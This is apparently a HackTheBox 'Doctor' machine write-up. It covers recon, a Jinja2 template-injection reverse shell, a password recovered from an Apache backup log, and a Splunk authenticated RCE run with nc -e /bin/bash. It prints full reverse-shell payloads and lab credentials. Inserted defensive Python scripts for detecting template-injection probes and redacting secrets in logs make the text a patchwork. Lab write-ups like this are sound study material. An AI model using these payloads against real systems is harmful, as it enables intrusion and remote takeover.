[Write Up][Hackthebox] Doctor

Dimas Fariski Setyawan Putra
3 min read · Jan 11, 2021

Hello, This is my write-up for the “Doctor” machine.

Reconnaissance and Enumeration

As usual, let's dig for information about this machine. I'm going to use nmap for port scanning.

$ nmap -sV -sC -v -p- --min-rate=10000 -oN nmap.initial 10.10.10.209

I found port 8089 on this machine, but I couldn't access it. After some googling, I found that this splunkd service has an authenticated remote code execution vulnerability. Let's save that for later and try brute-forcing directories on port 80 instead.

$ wfuzz -c -w ~/payloads/big.txt -u "http://10.10.10.209/FUZZ" --hc 404,503 -t 100

Once again, nothing interesting here. Then I found out about the doctors.htb domain. Let's add it to /etc/hosts.

When I try to access http://doctors.htb, we get a different response!

Let's register an account and look for vulnerabilities. After a lot of testing for SQL injection, XSS, SSTI, and more, I still couldn't find any. Then I noticed a comment in the page source.

And apparently, my SSTI payload is triggered at /archive instead of /home.
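The payload in the next section chains Jinja2 filters and hides every `__` behind `\x5f` escapes, which is exactly the kind of trick that slips past a naive filter on `{{` or `__`. The following is an added example, not code from the write-up or from the Doctor application, of how a defender might screen user-supplied text (a post title, a comment body, a query parameter) for template-injection probes before it reaches a template engine or while triaging logs. The delimiter and keyword lists are my own assumptions about what a Jinja2-style probe looks like; tune them for the engine you actually run.

```python
import re

# Jinja2-style expression and statement delimiters (assumption: the app uses
# a Jinja2-like engine, which the write-up's payload strongly suggests).
EXPR_DELIMS = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)

# Attribute-walking primitives that a template probe needs to reach Python
# internals: dunder names or the attr() filter used to reach them indirectly.
DUNDER_OR_ATTR = re.compile(r"__\w+__|\|\s*attr\s*\(")

# Escape sequences commonly used to hide identifiers from simple filters.
HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
UNI_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})")

# Names that indicate an expression is trying to spawn a process.
PROCESS_NAMES = re.compile(r"\b(?:os|subprocess|popen|system)\b")

# The classic arithmetic canary (e.g. {{7*7}}) that confirms evaluation.
ARITHMETIC = re.compile(r"\d+\s*[*+/-]\s*\d+")


def normalize(text: str) -> str:
    """Decode \\xNN and \\uNNNN escapes so obscured identifiers become visible."""
    text = HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)
    text = UNI_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)
    return text


def ssti_indicators(text: str) -> list[str]:
    """Return human-readable reasons why `text` looks like a template-injection probe.

    An empty list means nothing template-like was found. A single entry
    ("delimiters present") is weak evidence on its own; anything beyond that
    is worth alerting on.
    """
    norm = normalize(text)
    exprs = EXPR_DELIMS.findall(norm)
    if not exprs:
        return []
    reasons = ["template expression delimiters present"]
    body = " ".join(exprs)
    if DUNDER_OR_ATTR.search(body):
        reasons.append("dunder attribute access or attr() filter inside expression")
    if norm != text:
        reasons.append("hex/unicode escapes obscured identifiers")
    if PROCESS_NAMES.search(body):
        reasons.append("references process-spawning names")
    if ARITHMETIC.search(body):
        reasons.append("arithmetic canary inside expression")
    return reasons


def is_suspicious(text: str) -> bool:
    """Delimiters alone are not enough; require at least one corroborating signal."""
    return len(ssti_indicators(text)) >= 2


if __name__ == "__main__":
    # Constructed sample inputs: one benign, one canary, one obfuscated probe.
    samples = [
        "Just a normal post title",
        "Hello {{name}}, thanks for reading",
        "{{7*7}}",
        "{{request|attr('\\x5f\\x5fclass\\x5f\\x5f')}}",
    ]
    for s in samples:
        print(f"{is_suspicious(s)!s:5}  {s!r}  {ssti_indicators(s)}")
```

The escape normalisation step is the important part: without it the last sample contains no literal `__`, and a filter that only greps for dunder names would pass it straight through. Run this as an input validator or over exported form submissions; for GET-based probes the same function works on the decoded query string of an access-log entry.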

Gaining Shell as user web

I used this payload to gain a reverse shell.

{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.38",6667));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")\'')|attr('read')()}}

Gaining Shell as user shaun

After struggling for a few hours to find a privilege escalation path, I noticed that the web user is a member of the adm group. This group is normally used for reading system logs, so I guessed there might be something useful under /var/log, and found a backup log at /var/log/apache2/backup. After a little forensics on it, I found a password string. I tried logging in as the shaun user with it, and it worked. We got the user flag.
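The lateral move here rests on two defensive failures: a secret ended up in an Apache log, and that log was readable by a low-privileged account via the adm group. The write-up doesn't say how the password appeared in the log; the example below assumes the common case of a secret submitted as a URL query parameter, which Apache records in the request line. This is added code, not part of the write-up or the target application, that scans access-log lines for credential-bearing parameters and produces a redacted copy suitable for a shared log location. The log lines and the parameter list are constructed for the example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Loose match for Apache common/combined log format (constructed for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Query-string keys that should never be logged in clear text (assumed list).
SECRET_PARAMS = {"password", "passwd", "pwd", "token", "secret", "api_key", "apikey"}

# Matches "?password=..." or "&password=..." up to the next separator, so the
# value can be blanked without touching the rest of the line.
SECRET_RE = re.compile(
    r"(?i)([?&](?:" + "|".join(map(re.escape, sorted(SECRET_PARAMS))) + r")=)[^&\s\"]*"
)


def find_leaked_secrets(lines):
    """Return one finding per secret-bearing query parameter seen in the log."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line; skip rather than guess
        parts = urlsplit(m.group("target"))
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            if key.lower() in SECRET_PARAMS and value:
                findings.append({
                    "ip": m.group("ip"),
                    "timestamp": m.group("ts"),
                    "path": parts.path,
                    "param": key,
                })
    return findings


def redact_line(line: str) -> str:
    """Replace the value of any secret parameter with a fixed marker."""
    return SECRET_RE.sub(r"\1[REDACTED]", line)


# Constructed sample log; the address, path and password are placeholders.
SAMPLE_LOG = [
    '10.0.0.5 - - [05/Sep/2020:11:17:34 +0000] "GET /reset_password?email=alice@example.com&password=example-not-real HTTP/1.1" 500 453',
    '10.0.0.5 - - [05/Sep/2020:11:18:01 +0000] "GET /home HTTP/1.1" 200 2345',
    '10.0.0.7 - - [05/Sep/2020:11:19:10 +0000] "POST /login HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for f in find_leaked_secrets(SAMPLE_LOG):
        print(f"{f['timestamp']} {f['ip']} leaked '{f['param']}' via {f['path']}")
    print("\nRedacted copy:")
    for line in SAMPLE_LOG:
        print(redact_line(line))
```

Scanning is the detection half; the fix is to stop secrets reaching the log at all (accept passwords only in POST bodies, which Apache does not record, and strip sensitive keys in the application), and to review who can read log and backup directories so that group membership like adm does not quietly become a credential store.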

Gaining Shell as user root

Remember, port 8089 has an authenticated RCE. Let's give it a shot using shaun's credentials.

$ python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.38 --username shaun --password Guitar123 --payload 'nc.traditional -e/bin/bash '10.10.14.38' '6666''

We got root flag!

LinkedIn: Dimas Fariski Setyawan Putra | LinkedIn

Twitter & Github: @nyxsorcerer
